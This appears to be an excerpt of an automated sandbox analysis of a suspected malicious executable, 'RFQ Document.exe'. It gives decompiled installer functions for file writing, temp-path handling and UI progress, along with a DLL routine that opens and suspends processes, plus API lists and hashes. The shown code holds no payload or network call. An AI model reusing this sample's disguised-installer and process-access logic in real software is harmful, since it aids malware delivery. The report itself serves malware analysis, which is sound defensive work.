				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405727(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004056E5("*?|<>/\":", _t5))) == 0) {
							E0040585F(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x00405e2b
0x00405e33
0x00405e47
0x00405e47
0x00405e4d
0x00405e5a
0x00405e5a
0x00405e5b
0x00405e5d
0x00405e61
0x00405e63
0x00405e6c
0x00405e6e
0x00405e88
0x00405e90
0x00405e90
0x00405e95
0x00405e97
0x00405e99
0x00405e9d
0x00405e9e
0x00405ea1
0x00405ea9
0x00405eab
0x00405eaf
0x00000000
0x00000000
0x00405eb5
0x00405eba
0x00000000
0x00000000
0x00000000
0x00405eba
0x00405ebf

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\RFQ Document.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E81
CharNextA.USER32(?,?,?,00000000), ref: 00405E8E
CharNextA.USER32(?,"C:\Users\user\Desktop\RFQ Document.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E93
CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405EA3

Strings

*?|<>/":, xrefs: 00405E71
C:\Users\user\AppData\Local\Temp\, xrefs: 00405E2A, 00405E2F
"C:\Users\user\Desktop\RFQ Document.exe" , xrefs: 00405E65

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\RFQ Document.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3416685499
Opcode ID: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
Instruction ID: 6784d5a4761720cd8368ccbdd0638492f40d0cd734ea18b92361b53ebca16514
Opcode Fuzzy Hash: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
Instruction Fuzzy Hash: BA11E671804B9129EB3217248C44B7B7F89CB5A7A0F18407BE5D5722C2C77C5E429EAD

Uniqueness

Uniqueness Score: -1.00%

Function 00403EEA, Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403EEA(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

0x00403efc
0x00403f90
0x00000000
0x00403f90
0x00403f0d
0x00403f11
0x00000000
0x00000000
0x00403f17
0x00403f20
0x00403f23
0x00403f23
0x00403f29
0x00403f2f
0x00403f2f
0x00403f3b
0x00403f41
0x00403f48
0x00403f4b
0x00403f4e
0x00403f50
0x00403f50
0x00403f58
0x00403f5e
0x00403f5e
0x00403f68
0x00403f6d
0x00403f70
0x00403f75
0x00403f78
0x00403f78
0x00403f88
0x00403f88
0x00000000

APIs

GetWindowLongA.USER32 ref: 00403F07
GetSysColor.USER32(00000000), ref: 00403F23
SetTextColor.GDI32(?,00000000), ref: 00403F2F
SetBkMode.GDI32(?,?), ref: 00403F3B
GetSysColor.USER32(?), ref: 00403F4E
SetBkColor.GDI32(?,?), ref: 00403F5E
DeleteObject.GDI32(?), ref: 00403F78
CreateBrushIndirect.GDI32(?), ref: 00403F82

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
Instruction ID: d9f5f29c4b32eaf67df6904808fcf7c938901a1e5be6cbe83ca05de02e5bcf8c
Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
Instruction Fuzzy Hash: A9215471904745ABC7219F78DD08B4BBFF8AF01715F04856AE856E22E0D734EA04CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004026AF, Relevance: 10.6, APIs: 7, Instructions: 89
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004026AF(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
				_t52 = E00402A29(0xfffffff0);
				 *(_t58 - 0x38) = _t24;
				if(E00405727(_t52) == 0) {
					E00402A29(0xffffffed);
				}
				E0040587F(_t52);
				_t27 = E0040589E(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x42ec34; // 0xc200
					 *(_t58 - 0x30) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004030E2(_t47);
						E004030B0(_t51,  *(_t58 - 0x30));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
						 *(_t58 - 0x34) = _t56;
						if(_t56 != _t47) {
							E00402E8E( *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x48) =  *_t56;
								E0040585F( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x48);
							}
							GlobalFree( *(_t58 - 0x34));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
						GlobalFree(_t51);
						 *((intOrPtr*)(_t58 - 0xc)) = E00402E8E(0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x38));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}

0x004026af
0x004026b1
0x004026bd
0x004026c0
0x004026ca
0x004026ce
0x004026ce
0x004026d4
0x004026e1
0x004026e9
0x004026ec
0x004026f2
0x00402700
0x00402705
0x00402709
0x0040270c
0x00402715
0x00402721
0x00402725
0x00402728
0x00402732
0x00402751
0x00402739
0x0040273e
0x00402746
0x00402749
0x0040274e
0x0040274e
0x00402758
0x00402758
0x0040276a
0x00402771
0x00402783
0x00402783
0x00402789
0x00402789
0x00402794
0x00402795
0x00402799
0x0040279d
0x004027a3
0x004027a3
0x004027aa
0x00402197
0x004028c1
0x004028cd

APIs

GlobalAlloc.KERNEL32(00000040,0000C200,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
GlobalFree.KERNEL32 ref: 00402758
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040276A
GlobalFree.KERNEL32 ref: 00402771
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402789
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 87c57808f8dc4d746d59b2b3a4cb472afbcf4a509c6767706d62590f2872af51
Instruction ID: 7359f6b8c72d8bce8f96c3519292fde75c250a44c6e0f48ea69dd088617f1d2a
Opcode Fuzzy Hash: 87c57808f8dc4d746d59b2b3a4cb472afbcf4a509c6767706d62590f2872af51
Instruction Fuzzy Hash: 9D319C71C00028BBCF216FA5DE88DAEBA79EF04364F14423AF914762E0C67949018B99

Uniqueness

Uniqueness Score: -1.00%

Function 00404EB3, Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404EB3(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42e404; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42ecd4; // 0x0
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405BE9(0, _t39, 0x429878, 0x429878, _a4);
					}
					_t26 = lstrlenA(0x429878);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42e3e8, 0x429878);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x429878;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x429878)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x429878, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x00404eb9
0x00404ec5
0x00404ec8
0x00404ece
0x00404eda
0x00404edd
0x00404ee0
0x00404ee6
0x00404ee6
0x00404eec
0x00404ef4
0x00404ef7
0x00404f14
0x00404f18
0x00404f21
0x00404f21
0x00404f2b
0x00404f34
0x00404f40
0x00404f47
0x00404f4b
0x00404f4e
0x00404f61
0x00404f6f
0x00404f6f
0x00404f73
0x00404f75
0x00404f78
0x00000000
0x00404f78
0x00404ef9
0x00404f01
0x00404f09
0x00404f0f
0x00000000
0x00404f0f
0x00404f09
0x00404ef7
0x00404f82

APIs

lstrlenA.KERNEL32(00429878,00000000,0041988C,73BCEA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041988C,73BCEA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041988C,73BCEA30), ref: 00404F0F
SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: eb6caf3ac7484f5f1db1ef618e0e0cbe7ab290b61210ffb6096f31fecf2f81c8
Instruction ID: b2aff46cb4fd7b93265c813df518c908744a9a116baeb32a25c95395085da7a4
Opcode Fuzzy Hash: eb6caf3ac7484f5f1db1ef618e0e0cbe7ab290b61210ffb6096f31fecf2f81c8
Instruction Fuzzy Hash: BA219D71900118BFDB119FA5CD80DDEBFB9EF45354F14807AF544B62A0C739AE408BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404782, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404782(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404790
0x0040479d
0x004047a3
0x004047e1
0x004047e1
0x004047f0
0x004047f7
0x00000000
0x004047f9
0x004047a5
0x004047b4
0x004047bc
0x004047bf
0x004047d1
0x004047d7
0x004047de
0x00000000
0x004047de
0x00000000

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040479D
GetMessagePos.USER32 ref: 004047A5
ScreenToClient.USER32 ref: 004047BF
SendMessageA.USER32(?,00001111,00000000,?), ref: 004047D1
SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047F7

Strings

f, xrefs: 004047D3

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
Instruction ID: 33b793b453c736b4b125c672a543aeedee0a766b6fda49c4207ece5d665b0003
Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
Instruction Fuzzy Hash: A1019271D00219BADB01DB94CC41BFEBBBCAB49711F10012BBB00B71C0C3B465018BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402B6E, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B6E(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x414c40; // 0xc200
					_t11 =  *0x428c50;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402b7b
0x00402b89
0x00402b8f
0x00402b8f
0x00402b9d
0x00402b9f
0x00402ba5
0x00402bac
0x00402bae
0x00402bae
0x00402bc4
0x00402bd4
0x00402be6
0x00402be6
0x00402bee

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B89
MulDiv.KERNEL32(0000C200,00000064,?), ref: 00402BB4
wsprintfA.USER32 ref: 00402BC4
SetWindowTextA.USER32(?,?), ref: 00402BD4
SetDlgItemTextA.USER32 ref: 00402BE6

Strings

verifying installer: %d%%, xrefs: 00402BBE

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: c9221edef022ada40c9d606a55ceb5485b01ba3fbe0a0649ceb5ce67f638be65
Instruction ID: 6a78b715a9a8e57134c517a6b1d06892db6ee10875a93ca7b4af16268fa1b879
Opcode Fuzzy Hash: c9221edef022ada40c9d606a55ceb5485b01ba3fbe0a0649ceb5ce67f638be65
Instruction Fuzzy Hash: 0C014470544208BBDF209F60DD49FEE3769FB04345F008039FA06A52D0DBB499558F95

Uniqueness

Uniqueness Score: -1.00%

Function 6FD841A0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E6FD841A0(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char* _a20, int _a24, int _a28, int _a32) {
				int _v8;
				int _v12;
				void* _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				int _v44;
				void* _v48;
				int _t67;
				intOrPtr _t68;
				intOrPtr _t70;
				int _t71;
				int _t73;
				int _t77;
				int _t80;
				int _t89;
				void* _t117;
				void* _t122;
				void* _t123;
				void* _t124;

				_v40 = E6FD81490(_a4);
				_v36 = 0x80004005;
				_t67 = _a24;
				0x6fd80000(_a20, _t67, _a28, _a32);
				_t68 = _a12;
				0x6fd80000(_t68, _a16, _t67);
				0x6fd80000("%p, %u, %s, %s, %p, %u, %p.\n", _a4, _a8, _t68);
				_push(_v40);
				_t70 = E6FD81120(_v40);
				_t122 = _t117 + 0x34;
				_v20 = _t70;
				if(_v20 == 0) {
					return 0x8000ffff;
				}
				__eflags = _a8 - 0xffffffff;
				if(__eflags != 0) {
					_t71 = E6FD813B0(__eflags, _v20, _a8);
					_t123 = _t122 + 8;
					_v12 = _t71;
				} else {
					_t89 = E6FD813F0(__eflags, _v20, _a12, _a16);
					_t123 = _t122 + 0xc;
					_v12 = _t89;
				}
				__eflags = _v12;
				if(_v12 != 0) {
					_t73 = GetFileVersionInfoSizeA(_v12 + 0x40,  &_v44);
					_v8 = _t73;
					__eflags = _v8;
					if(_v8 != 0) {
						0x6fd80000(_v8);
						_t124 = _t123 + 4;
						_v16 = _t73;
						__eflags = _v16;
						if(_v16 != 0) {
							_t77 = GetFileVersionInfoA(_v12 + 0x40, _v44, _v8, _v16);
							__eflags = _t77;
							if(_t77 == 0) {
								L27:
								0x6fd80000(_v16);
								return _v36;
							}
							_t80 = VerQueryValueA(_v16, _a20,  &_v48,  &_v8);
							__eflags = _t80;
							if(_t80 == 0) {
								goto L27;
							}
							__eflags = _a32;
							if(_a32 != 0) {
								 *_a32 = _v8;
							}
							__eflags = _a24;
							if(_a24 != 0) {
								__eflags = _a28;
								if(_a28 != 0) {
									__eflags = _v8 - _a28;
									if(_v8 >= _a28) {
										_v24 = _a28;
									} else {
										_v24 = _v8;
									}
									_v28 = _v24;
									__eflags = _v28;
									if(_v28 != 0) {
										0x6fd80000(_a24, _v48, _v28);
										_t124 = _t124 + 0xc;
									}
								}
							}
							__eflags = _a24;
							if(_a24 == 0) {
								L25:
								_v32 = 0;
								L26:
								_v36 = _v32;
								goto L27;
							}
							__eflags = _a28 - _v8;
							if(_a28 >= _v8) {
								goto L25;
							}
							_v32 = 1;
							goto L26;
						}
						return 0x8007000e;
					}
					return 0x80004005;
				} else {
					0x6fd80000("Was unable to locate module.\n");
					return 0x80070057;
				}
			}

0x6fd841b2
0x6fd841b5
0x6fd841c4
0x6fd841cc
0x6fd841d9
0x6fd841dd
0x6fd841f3
0x6fd841fe
0x6fd841ff
0x6fd84204
0x6fd84207
0x6fd8420e
0x00000000
0x6fd84210
0x6fd8421a
0x6fd8421e
0x6fd84241
0x6fd84246
0x6fd84249
0x6fd84220
0x6fd8422c
0x6fd84231
0x6fd84234
0x6fd84234
0x6fd8424c
0x6fd84250
0x6fd84274
0x6fd84279
0x6fd8427c
0x6fd84280
0x6fd84290
0x6fd84295
0x6fd84298
0x6fd8429b
0x6fd8429f
0x6fd842be
0x6fd842c3
0x6fd842c5
0x6fd84358
0x6fd8435c
0x00000000
0x6fd84364
0x6fd842db
0x6fd842e0
0x6fd842e2
0x00000000
0x00000000
0x6fd842e4
0x6fd842e8
0x6fd842f0
0x6fd842f0
0x6fd842f2
0x6fd842f6
0x6fd842f8
0x6fd842fc
0x6fd84301
0x6fd84304
0x6fd84311
0x6fd84306
0x6fd84309
0x6fd84309
0x6fd84317
0x6fd8431a
0x6fd8431e
0x6fd8432c
0x6fd84331
0x6fd84331
0x6fd8431e
0x6fd842fc
0x6fd84334
0x6fd84338
0x6fd8434b
0x6fd8434b
0x6fd84352
0x6fd84355
0x00000000
0x6fd84355
0x6fd8433d
0x6fd84340
0x00000000
0x00000000
0x6fd84342
0x00000000
0x6fd84342
0x00000000
0x6fd842a1
0x00000000
0x6fd84252
0x6fd84257
0x00000000
0x6fd8425f

Strings

Was unable to locate module., xrefs: 6FD84252
%p, %u, %s, %s, %p, %u, %p., xrefs: 6FD841EE

Memory Dump Source

Source File: 00000001.00000002.674416889.000000006FD81000.00000020.00020000.sdmp, Offset: 6FD80000, based on PE: true

Associated: 00000001.00000002.674409243.000000006FD80000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.674432507.000000006FD89000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.674450695.000000006FD8A000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.674476668.000000006FD8B000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.674530569.000000006FD8D000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.674578918.000000006FD8E000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: %p, %u, %s, %s, %p, %u, %p.$Was unable to locate module.
API String ID: 0-1385147342
Opcode ID: 78bd1eabc05ccfd9a8696feffe4a5cfcede421f77cd8a5028e6a1d36325a2ca4
Instruction ID: 1e73a2d42eeb8685d10fa3c7c2d408b81f343b2f026b7f8c395feaf149f6797b
Opcode Fuzzy Hash: 78bd1eabc05ccfd9a8696feffe4a5cfcede421f77cd8a5028e6a1d36325a2ca4
Instruction Fuzzy Hash: 32512DB5D04209EBCB44DFA8D884BDE77B9BF49308F108219E925A7280D735FA44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6FD86A70, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 17%

			E6FD86A70(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				long* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long* _t49;

				_v28 = E6FD814A0(_a4);
				0x6fd80000("%p, %#x, %u.\n", _a4, _a8, _a12);
				_push(_v28);
				_v8 = E6FD81120(_a4);
				if(_v8 != 0) {
					if((_v8[1] & 0x00000001) == 0) {
						0x6fd80000("Unsupported attach flags %#x.\n", _v8[1]);
						return 0x80004001;
					}
					if((_v8[1] & 0x00000004) != 0) {
						_v16 = 0;
					} else {
						_v16 = 1;
					}
					_v20 = _v16;
					_v12 = 0x1030;
					if(_v20 != 0) {
						_v12 = _v12 | 0x00000800;
					}
					_v8[2] = OpenProcess(_v12, 0,  *_v8);
					if(_v8[2] != 0) {
						if(_v20 != 0) {
							_t49 = _v8;
							0x6fd80000( *((intOrPtr*)(_t49 + 8)));
							_v24 = _t49;
							if(_v24 != 0) {
								0x6fd80000("Failed to suspend a process, status %#x.\n", _v24);
							}
						}
						return 0;
					} else {
						0x6fd80000("Failed to get process handle for pid %#x.\n",  *_v8);
						return 0x8000ffff;
					}
				}
				return 0x8000ffff;
			}

0x6fd86a82
0x6fd86a96
0x6fd86aa1
0x6fd86aaa
0x6fd86ab1
0x6fd86ac6
0x6fd86b82
0x00000000
0x6fd86b8a
0x6fd86ad5
0x6fd86ae0
0x6fd86ad7
0x6fd86ad7
0x6fd86ad7
0x6fd86aea
0x6fd86aed
0x6fd86af8
0x6fd86b03
0x6fd86b03
0x6fd86b1b
0x6fd86b25
0x6fd86b45
0x6fd86b47
0x6fd86b4e
0x6fd86b56
0x6fd86b5d
0x6fd86b68
0x6fd86b6d
0x6fd86b5d
0x00000000
0x6fd86b27
0x6fd86b32
0x00000000
0x6fd86b3a
0x6fd86b25
0x00000000

APIs

OpenProcess.KERNEL32(00001030,00000000,00000000), ref: 6FD86B12

Strings

Unsupported attach flags %#x., xrefs: 6FD86B7D
%p, %#x, %u., xrefs: 6FD86A91
Failed to get process handle for pid %#x., xrefs: 6FD86B2D
Failed to suspend a process, status %#x., xrefs: 6FD86B63

Memory Dump Source

Source File: 00000001.00000002.674416889.000000006FD81000.00000020.00020000.sdmp, Offset: 6FD80000, based on PE: true

Associated: 00000001.00000002.674409243.000000006FD80000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.674432507.000000006FD89000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.674450695.000000006FD8A000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.674476668.000000006FD8B000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.674530569.000000006FD8D000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.674578918.000000006FD8E000.00000002.00020000.sdmp Download File

Similarity

API ID: OpenProcess
String ID: %p, %#x, %u.$Failed to get process handle for pid %#x.$Failed to suspend a process, status %#x.$Unsupported attach flags %#x.
API String ID: 3743895883-1030270061
Opcode ID: 3360cc99b38f6f1617c2b222c560597c1a65ab6081c75a87a04e6e4cd3b47f7a
